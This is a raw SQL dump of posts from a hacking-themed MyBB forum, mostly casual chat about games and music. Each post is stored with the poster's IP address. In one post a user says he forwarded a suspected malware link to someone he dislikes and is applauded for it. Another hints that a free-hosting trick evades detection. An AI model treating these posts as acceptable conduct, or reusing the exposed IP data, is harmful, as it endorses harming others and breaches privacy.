'817', '4281', '7', 'RE: Favorite Quote?', '0', '61', 'NXK', '1350007164', 'veni, vici, vidi I came, I saw, I conquered. One of my all time favorite pics [img]http://www.onestopmuscle.co.uk/wp-content/uploads/2011/09/Arnold-Conquer-1.jpg[/img]', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '3cbe45808887a938f030a9255f5d46a0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4296', '803', '4186', '4', 'RE: bye LH fun knowing u', '0', '3', '??????????¢™', '1350012806', 'Well here is my one last goodbye. GOODBYE SEE YOU NEVER!!', '75.38.19.52', '1260786484', '1', '0', '3', '1350012828', '1', '2df03798e67d72ecf38463ec1bf8c8ca', '0', '1350012828'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4297', '729', '4230', '7', 'RE: Skype Virus [MUST READ!]', '0', '3', '??????????¢™', '1350013559', '[quote=\'iTzIpod\' pid=\'4230\' dateline=\'1349955720\'] My friend got infected. And I almost clicked on the link. But then I just copied it and gave it to someone on Facebook that doesn\'t like me. And I don\'t like him either. So I think he clicked on it not sure.. But I knew it was a Hotfile.com link. [/quote] Oh okay well if he did good for you.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '4db21d929943e9802b9c926797da027d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4298', '804', '4209', '42', 'RE: Ninja caught in US Airport', '0', '205', 'mothered', '1350014479', 'My goodness, just when you thought you\'ve seen It all, then this happens. Who knows what his Intentions were.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'dd6196bbf9401b822b645d0e8fd409e8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4299', '810', '4259', '64', 'RE: Good website\'s for Movie\'s to Watch', '0', '205', 'mothered', '1350014564', 'An excellent list Indeed mate. Thanking you.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '9645ad20289b3b76c818fe4edfa1caad', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4300', '717', '3644', '12', 'RE: How to Bruteforce VPS!', '0', '205', 'mothered', '1350014940', 'Very well documented and Illustrated mate. Appreciated.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '8adbde768c18e7e1db76e3632d16a36b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4301', '690', '3516', '69', 'RE: What are your fav or which coding languages do you know?', '0', '205', 'mothered', '1350015283', 'I do a lot of web-based coding, so Javascript, CSS, and HTML. A bit of VB too.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'ed040c26eff44d9006f38942957d0688', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4302', '822', '0', '47', 'Huge Ultimate Graphics Pack Worth $2.400 | GIVEAWAY | Become A Pro GFX Designer |', '17', '228', 'VirtualLegend', '1350029946', '[[align=center][b][color=#32CD32][size=xx-large]Huge Graphics Pack Worth $2.400 | GIVEAWAY |[/size][/color][/b][/align] [align=center][color=#FFFFFF][size=medium]Hello LH Members, I\'m Back with a new GIVEAWAY. Today i have a Huge Ultimate Graphics pack that 10 times better is than the Ninja Kit. The graphics is about 2.400 dollars worth and that is alot of money. How do you get it? First Leave a Post behind that you want the Graphics pack. (You can post 100 times it doesn\'t matter) After a Week I will choose a 10 random Members in the comments and i will send them the graphics pack [size=large][color=#FFD700]Thats All It\'s very EASY[/color][/size][/size][/color][/align] [align=center][size=xx-large][color=#FF4500]Download Link: [code]https://www.dropbox.com/sh/sk4oba3aiypp155/fUfpNxHlEv[/code][/color][/size][/align] [align=center][img]https://s3.amazonaws.com/GraphicsMystic/wso3/wso1_01.jpg[/img][/align] [align=center][img]https://s3.amazonaws.com/GraphicsMystic/wso3/13wso2_02.jpg[/img][/align] [align=center][img]https://s3.amazonaws.com/GraphicsMystic/wso3/13wso1_03.jpg[/img][/align] [align=center][img]https://s3.amazonaws.com/GraphicsMystic/wso3/wso4_03.jpg[/img][/align] [align=center][img]https://s3.amazonaws.com/GraphicsMystic/wso3/13wso3_01.jpg[/img][/align]', '81.18.248.110', '1360197742', '1', '0', '228', '1350595392', '1', 'f31d65361b27332e0f8a7d29f192dcb4', '0', '1350595392'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4303', '810', '4259', '64', 'RE: Good website\'s for Movie\'s to Watch', '0', '62', 'R?????zo?', '1350031148', 'Thanks for the feedback, really great sites.', '5.158.61.162', '94256546', '1', '0', '0', '0', '1', '66955df83531d7d3afe04f37f74bce4e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4304', '817', '4295', '7', 'RE: Favorite Quote?', '0', '62', 'R?????zo?', '1350031929', '[quote=\'NXK\' pid=\'4295\' dateline=\'1350007164\'] veni, vici, vidi I came, I saw, I conquered. One of my all time favorite pics [img]http://www.onestopmuscle.co.uk/wp-content/uploads/2011/09/Arnold-Conquer-1.jpg[/img] [/quote] Veni, vici, vidi How could i forget that one.', '5.158.61.162', '94256546', '1', '0', '0', '0', '1', '43b0b75aed945f8f7d68c9d8bb3c0070', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4305', '821', '4294', '28', 'RE: What\'s on your mind or what are your future plans?', '0', '62', 'R?????zo?', '1350032070', 'Thinking about engage with my girlfriend, but thinking it\'s too early :/', '5.158.61.162', '94256546', '1', '0', '0', '0', '1', 'e33412992cf5953c3a87632ff232362a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4306', '823', '0', '8', 'Fifa 11 Soundtracks', '10', '228', 'VirtualLegend', '1350032389', '[align=center][color=#32CD32][size=medium]Hello, I was playing Fifa 11 yesterday and what i was questioning what for music track Fifa had. If you play Fifa 11 and you love a song at the game and don\'t know the name of the song. Watch the Video Below [video=youtube]http://www.youtube.com/watch?v=o4LotLxlFuA[/video] Peace OUT[/size][/color][/align]', '81.18.248.110', '1360197742', '1', '0', '0', '0', '1', '91ea097ef987e381cb6c5918afd76761', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4307', '790', '4126', '58', 'RE: Unique - Recruitment', '0', '62', 'R?????zo?', '1350033081', 'Thanks t3h jok3r. For others, feel free to apply.', '5.158.61.162', '94256546', '1', '0', '0', '0', '1', '80291b428c987b4328b8eb8c127d1ad6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4308', '823', '4306', '8', 'RE: Fifa 11 Soundtracks', '0', '62', 'R?????zo?', '1350033148', 'Yeah I loved the songs back then, thanks mate.', '5.158.61.162', '94256546', '1', '0', '62', '1350033233', '1', '0309279b57dabeae31b91532a41989d9', '0', '1350033233'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4309', '817', '4281', '7', 'RE: Favorite Quote?', '0', '53', 'sirchamp', '1350035048', 'Alea iacta est. From Julius Caesar', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '6d51f2248db2f519723f6d719ecf5cc3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4310', '824', '0', '4', 'Glowing Here!', '0', '253', 'GlowingCapes', '1350035669', 'Hey guys! GlowingCapes here, and I\'m new to LH. I hope to bring more discussions to the less-active forums like gaming and graphics :D Well.. that\'s basically all I have to say today. Hope to meet some of you. See you all around!', '173.76.159.245', '-1387487243', '0', '0', '0', '0', '1', '4d1c9b43ce6509b4218f081c0b38421f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4311', '238', '1021', '56', 'RE: Ban the user above you', '0', '253', 'GlowingCapes', '1350035797', 'Banned for having a good sig.. o.O', '173.76.159.245', '-1387487243', '0', '0', '0', '0', '1', 'c3ee2039af04f972b923d3ded942423e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4312', '767', '3913', '74', 'RE: Do you cheat/hack games?', '0', '253', 'GlowingCapes', '1350035862', 'I dupe on Minecraft (xbox) and bot on Runescape. I think that\'s about it. Edit: And Cod 5 Zombies, classic :P', '173.76.159.245', '-1387487243', '0', '0', '253', '1350037178', '1', '985917f7b8c17381d3933fe368374434', '0', '1350037178'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4313', '692', '3518', '71', 'RE: COD Black OPs or COD MW3?', '0', '253', 'GlowingCapes', '1350036034', 'Well, they\'re basically 2 different CoD\'s. It matters what kind of gameplay I\'m going for to pick on which one I\'m playing. But I mostly only play Zombies on Black Ops.', '173.76.159.245', '-1387487243', '0', '0', '0', '0', '1', '9eefb5c09c4f71cc704bd9188ac1813c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4314', '815', '4267', '73', 'RE: your favourite iOS games', '0', '253', 'GlowingCapes', '1350036113', 'My favorite game is Subway Surfers at the moment. It\'s pretty fun once you get the hang of it but very repetitive so you can\'t play it for hours on end.', '173.76.159.245', '-1387487243', '0', '0', '0', '0', '1', '67f7ba624ea3e0d3b9eb0a88ff1a8216', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4315', '815', '4314', '73', 'RE: your favourite iOS games', '0', '62', 'R?????zo?', '1350036300', '[quote=\'GlowingCapes\' pid=\'4314\' dateline=\'1350036113\'] My favorite game is Subway Surfers at the moment. It\'s pretty fun once you get the hang of it but very repetitive so you can\'t play it for hours on end. [/quote] I will give this game a shot, the reason I created this thread is so I could download new games :P', '5.158.61.162', '94256546', '1', '0', '0', '0', '1', '605283a9331fda164cf6d7404c4b4a9f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4316', '824', '4310', '4', 'RE: Glowing Here!', '0', '62', 'R?????zo?', '1350036353', 'Welcome to the community, stay active and HQ :)', '5.158.61.162', '94256546', '1', '0', '0', '0', '1', '16c4912351545db7edc9b1188e907377', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4317', '767', '3913', '74', 'RE: Do you cheat/hack games?', '0', '62', 'R?????zo?', '1350036471', 'What do you expect when you ask on a Hacking forum if people hack games, 99% will say yes I think :P', '5.158.61.162', '94256546', '1', '0', '0', '0', '1', 'a21dbd92903710b18493cc5d028b17ba', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4318', '815', '4315', '73', 'RE: your favourite iOS games', '0', '253', 'GlowingCapes', '1350037108', '[quote=\'R?????zo?\' pid=\'4315\' dateline=\'1350036300\'] [quote=\'GlowingCapes\' pid=\'4314\' dateline=\'1350036113\'] My favorite game is Subway Surfers at the moment. It\'s pretty fun once you get the hang of it but very repetitive so you can\'t play it for hours on end. [/quote] I will give this game a shot, the reason I created this thread is so I could download new games :P [/quote] Yeah, I figured that when you saw it. Do you have any games that you like to play long-term? I need one like that, haven\'t had one in a while.', '173.76.159.245', '-1387487243', '0', '0', '253', '1350037120', '1', '2a2878a9919bd5486285714cb136f38b', '0', '1350037120'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4319', '171', '528', '8', 'RE: What Genre do you listen to?', '0', '253', 'GlowingCapes', '1350037546', 'I mostly listen to Rap and Dupstep. I just don\'t know about any other music that\'s good for my likings D:', '173.76.159.245', '-1387487243', '0', '0', '0', '0', '1', '2b9d4b610ff2daa9a5ece50134a3dcc1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4320', '825', '0', '8', 'Favorite Rappers?', '0', '253', 'GlowingCapes', '1350037699', 'Hey guys. I\'ve been listening to the same rappers constantly (Meek Mill, Wiz Khalifa, and I guess Tyga is rap? I don\'t know) and I need a new one. Anyone have a really good rapper that isn\'t well known or something? Thanks. (Do not reply to this topic saying someone like Lil\' Wayne .. :o, perhaps not a commercial rapper at all?)', '173.76.159.245', '-1387487243', '0', '0', '253', '1350037714', '1', 'da16ca82fd5145a61d1a1e489f58116a', '0', '1350037714'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4321', '238', '1021', '56', 'RE: Ban the user above you', '0', '53', 'sirchamp', '1350038210', 'Banned for beeing new...:O', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'f56e5675e1866602751033e53d0e7da7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4322', '190', '665', '56', 'RE: Copy and paste game', '0', '199', 'Anonymous™', '1350043602', 'http://www.youtube.com/watch?v=9_YT2igOAHM&feature=b-cat-comedy', '85.230.51.22', '1441149718', '1', '0', '0', '0', '1', '070bb6bccaf1623912fda49f871c42c5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4323', '418', '1925', '16', 'RE: [eBook][Special] iTzIpod\'s SEing Tutorial', '0', '53', 'sirchamp', '1350043640', 'Nice e-book. The layout isnt the best but the content is the thing that matters.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '2d47096605b1d53d03d81eaa55100b61', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4324', '486', '2353', '56', 'RE: Guess how many?', '0', '205', 'mothered', '1350044106', 'I never would\'ve thought It was so many. Nice one.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'e0eae4864acdcd37a09e494c5c532efe', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4325', '826', '0', '7', 'L33T Hacking Tinychat Room', '0', '100', '??zg???g????61', '1350054899', 'Hello everyone, I made a Tinychat room for ANY members to talk to each other on. The link is- http://tinychat.com/63pcw members of l33t hacking should NOT give this out, as this is for our members only. If someone that isn\'t a l33t hacking member joins I will have to ban them. Alright well I hope to see you all on there ;)', '96.237.179.21', '1626190613', '1', '0', '0', '0', '1', '1a8b21f2dcbf89f119b8afe0c1a81056', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4326', '827', '0', '76', 'Playstation names', '0', '254', 'Greed', '1350057570', 'So I was wondering if any of you have a playstation 3, and if yeah do well you could post your psn so people can add you or what ever. I\'ll go first My Psn is EpicTacoTime.', '63.153.255.202', '1067057098', '0', '0', '0', '0', '1', '16bc4644ef359b7ba89ae6e0364e1776', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4327', '828', '0', '71', 'Planetary Anhiliation', '0', '254', 'Greed', '1350058074', 'Basically this a new and upcoming Rts game, It looks pretty awesome [video=youtube]http://www.youtube.com/watch?feature=player_embedded&v=FhEYvOYceNs[/video] Yeah if you watched the video up above, then check out their site to pre order or to help them with money. They done other great games you probably heard of like well i cant think of any right now lol. http://www.kickstarter.com/projects/659943965/planetary-annihilation-a-next-generation-rts But go their and it will tell you all about the game and what not and doodling mcdads there. Sorry if posting a link is against the rules, if it is I\'ll take it down.', '63.153.255.202', '1067057098', '0', '0', '0', '0', '1', '946881d2d76d8f077b93003839364619', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4328', '829', '0', '74', 'Adventure Quest Worlds', '0', '254', 'Greed', '1350058283', 'Does any one play this game, It\'s pretty awesome I brought membership for 3 months. It pretty much a mmorpg in your browser. There is a ton of classes to choose from like right now, im a evolved Shaman just go it yesterday. They recently put in guilds I think so if anyone wants to play just type in Aq in google. Also my name in game is Toki The ArchAngel.', '63.153.255.202', '1067057098', '0', '0', '0', '0', '1', '56c54225a3ec0766b5a6aa5deae8f2e3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4329', '697', '3554', '74', 'RE: Who plays Minecraft out here?', '0', '61', 'NXK', '1350058548', 'I have before, I used to own a few servers for it.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '0f10ae2c222793e247825c7956c06c1a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4330', '767', '3913', '74', 'RE: Do you cheat/hack games?', '0', '61', 'NXK', '1350058666', 'Since I\'ve played counter-strike for so long I hate hackers, I even pay to play on cheat free servers monthly.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', 'c262130f5d7083960ec1fd095e684291', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4331', '830', '0', '8', 'Feathery wings - Voltaire', '0', '254', 'Greed', '1350058812', 'Hey guys, Im bring You a video featuring Voltaire\'s song Feathery Wings. [video=youtube]http://www.youtube.com/watch?v=9oMxckcYTg8&feature=bf_prev&list=AL94UKMTqg-9A5HfWPCzJ6qYjWkG_Jg3pV[/video] I just love this song I don\'t know why, Just give it a chance.', '63.153.255.202', '1067057098', '0', '0', '0', '0', '1', 'bfe12c68d01bb8cfd71a339515e63840', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4332', '609', '2944', '58', 'RE: Gamers Recruitment', '0', '254', 'Greed', '1350059459', 'All you need to know that I game when ever I can, which is basically off work so that basically everyday. Yep that\'s my application. Also I play for fun, never for serious like everyone one on cod, that\'s why I troll em lol. Yeah either accept me or deny me, don\'t matter to me.', '63.153.255.202', '1067057098', '1', '0', '0', '0', '1', 'cf14bb17b8ae34764df08f79c45d7643', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4333', '678', '4079', '29', 'RE: Get Free Domain names & Webhosting Packages e-Book [Written by me!]', '0', '172', 'MistaCode', '1350060722', '[quote=\'??????????¢™\' pid=\'4079\' dateline=\'1349823195\'] Thanks for the E-Book but im not going to try it, too risky. [/quote] I can guarantee you wont get caught doing this ;)', '88.193.83.195', '1489064899', '0', '0', '0', '0', '1', 'f97b074a7e1a24ea3b0a79d5e9860c07', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4334', '831', '0', '7', 'Join My GIVEAWAY', '0', '228', 'VirtualLegend', '1350064195', '[align=center][color=#32CD32][size=medium]Hello LH Members, I have recently posted a thread where you can make chance on a Huge Ultimate Graphics Pack That around 2.400 dollars is Worth. I will choose 10 random members in the comments. To win the Graphics Pack you need to post that you want to Pack. I have not a single post on my thread, so if you\'re intrested check the link below (For more info) Thread: http://l33thacking.net/thread-822.html Sorry for my bad English :P[/size][/color][/align]', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '200102f9c751eb1967d9f25a0aa3ceda', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4335', '702', '3593', '35', 'RE: You guys like my new userbar?', '0', '253', 'GlowingCapes', '1350067492', 'I like it, looks awesome. Nice job!', '173.76.159.245', '-1387487243', '0', '0', '0', '0', '1', '1be9ac0c696dc1c623b37d9f7fca2722', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4336', '697', '3554', '74', 'RE: Who plays Minecraft out here?', '0', '100', '??zg???g????61', '1350068460', 'I have an Indev account ;) I\'ve owned it for a while but I only play if someone asks me to play with them. Otherwise I don\'t find it very fun.', '96.237.179.21', '1626190613', '1', '0', '0', '0', '1', '8a438bfa6a80b62f7c95d9040ba5de24', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4337', '486', '2353', '56', 'RE: Guess how many?', '0', '253', 'GlowingCapes', '1350068512', '26! That\'s all I found in the 30 seconds I spent looking at it. :P Haha, I only missed like 14.. (only..)', '173.76.159.245', '-1387487243', '0', '0', '253', '1350068597', '1', 'c1232bb8395abd29932217192e300e99', '0', '1350068597'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4338', '487', '4232', '56', 'RE: Corrupt a wish', '0', '62', 'R?????zo?', '1350071488', '[quote=\'iTzIpod\' pid=\'4232\' dateline=\'1349955825\'] Granted but your house burned to the ground + the $1,000,000,000. I wish I was Rainbow Dash <3 [/quote] granted but turns out you look more like Justin Bieber. I wish I had more then 1billion dollars.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '3e1223b35de2f1d0e4496c9a67fc48ba', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4339', '487', '2354', '56', 'RE: Corrupt a wish', '0', '232', 'BreShiE', '1350078538', 'Granted, but now you don\'t know who\'s your real friends, or who\'s you friend just for your money. I wish famine to be ridden from the world.', '78.149.81.254', '1318408702', '1', '0', '0', '0', '1', '6274cf56ad431b6a807b3ca5fa62291c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, 